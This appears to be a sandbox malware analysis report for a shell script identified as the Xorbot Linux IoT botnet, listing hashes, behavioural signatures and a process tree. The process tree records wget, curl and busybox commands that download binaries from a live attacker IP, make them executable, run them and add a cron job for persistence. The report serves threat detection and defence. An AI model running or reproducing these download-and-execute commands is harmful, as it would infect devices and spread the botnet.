Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    150s
  • max time network
    162s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    29-11-2024 17:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    40923aeaf01e0f3f644d5ccba48dd1c1

  • SHA1

    3a5a881c9131e5a2c63324a244681eca6f38dfe6

  • SHA256

    87e202798f80ed10b0857470fe32a9bf5ab5ee4644974700d266b1323b90a615

  • SHA512

    c25de22b41b4c157ff863a2d46c684b6f960390b8c7fb1f22389db1dcbcbf082375ec93500e9daf93f7b6b149c60f8929cf0a4aac857452d54dc5596eeae60dc

  • SSDEEP

    192:fEwGF9xAHbc+OY/8Yw/fi9kA4l11Z7kA4l1IEwGF9CHbXxD8Yw/fL:fEwGF9xAHbc+OY59kA4l11Z7kA4l1IEf

Score
10/10
xorbotantivmbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatiotrojan

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (2053) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:647
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:649
        • /usr/bin/wget
          wget http://216.126.231.240/bins/4Tm887e6RPGcuyFWU4PMnOE7aIR3BGZX5H
          2⤵
          • Writes file to tmp directory
          PID:655
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/4Tm887e6RPGcuyFWU4PMnOE7aIR3BGZX5H
          2⤵
          • Checks CPU configuration
          • Writes file to tmp directory
          PID:669
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/4Tm887e6RPGcuyFWU4PMnOE7aIR3BGZX5H
          2⤵
          • Writes file to tmp directory
          PID:679
        • /bin/chmod
          chmod 777 4Tm887e6RPGcuyFWU4PMnOE7aIR3BGZX5H
          2⤵
          • File and Directory Permissions Modification
          PID:681
        • /tmp/4Tm887e6RPGcuyFWU4PMnOE7aIR3BGZX5H
          ./4Tm887e6RPGcuyFWU4PMnOE7aIR3BGZX5H
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:682
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:684
              • /usr/bin/crontab
                crontab -l
                4⤵
                • Reads runtime system information
                PID:685
            • /bin/sh
              sh -c "crontab -"
              3⤵
                PID:686
                • /usr/bin/crontab
                  crontab -
                  4⤵
                  • Creates/modifies Cron job
                  PID:687
            • /bin/rm
              rm 4Tm887e6RPGcuyFWU4PMnOE7aIR3BGZX5H
              2⤵
                PID:689
              • /usr/bin/wget
                wget http://216.126.231.240/bins/GnRbaSJzqV4rn4uPmuZqtrJ6gwyKJUZevm
                2⤵
                  PID:692
                • /usr/bin/curl
                  curl -O http://216.126.231.240/bins/GnRbaSJzqV4rn4uPmuZqtrJ6gwyKJUZevm
                  2⤵
                    PID:693

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/4Tm887e6RPGcuyFWU4PMnOE7aIR3BGZX5H
                  Filesize

                  127KB

                  MD5

                  89077b7bd4bcafca7713be43635c4862

                  SHA1

                  fc02edb8fba29ea8ee99e6157ef8560334530052

                  SHA256

                  78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

                  SHA512

                  1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

                  Download Submit

                • /var/spool/cron/crontabs/tmp.j7CsFf
                  Filesize

                  210B

                  MD5

                  d1850b5b9561cc0ba738d93dabe59e64

                  SHA1

                  c493653be117f35e6f0f8cda7bc7cb58e0d44588

                  SHA256

                  539031b70e6829f536db7721fd9fecdcf79c0c3d329ff6e682652b28626d5643

                  SHA512

                  eb2d9490eae941c8ff8eca9a2f88ce89509ce010e930642ae3d818c5e9530c691339e539dfc4d1b9f1c78704ff395a63e5cb2cd1ae87edc0685b202e793ef79c

                  Download Submit